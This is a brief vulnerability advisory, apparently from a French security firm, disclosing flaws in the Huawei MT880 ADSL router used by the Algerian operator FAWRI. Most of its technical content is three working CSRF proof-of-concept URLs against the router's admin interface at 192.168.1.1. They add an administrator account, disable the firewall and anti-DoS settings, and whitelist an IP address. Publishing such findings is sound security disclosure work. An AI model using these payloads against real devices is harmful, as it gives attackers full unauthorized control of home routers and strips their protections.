Description:
Huawei MT880 is a device offered by the algerian telecom operator - FAWRI, to provide ADSL Internet connexion and it's already widely in use.
Overview:
Huawei MT880 firmware and its default configuration has flaws, which allows LAN users to gain unauthorized full access to device.
Here are just limited PoCs.
Possible XSRFs:
Adding an administrator user:
http://192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70
Disabling firewall/anti-DoS… features:
http://192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70
Adding an IP address allowed by the firewall:
http://192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7
Over flaws are not covered in this advisory.
Cheers
/JA
Jerome Athias
JA-PSI, French IT Security Company
http://www.ja-psi.fr
Are you ready to FRHACK?
International, Technical IT Security Conferences & Trainings, September 7-11th, France
http://www.frhack.org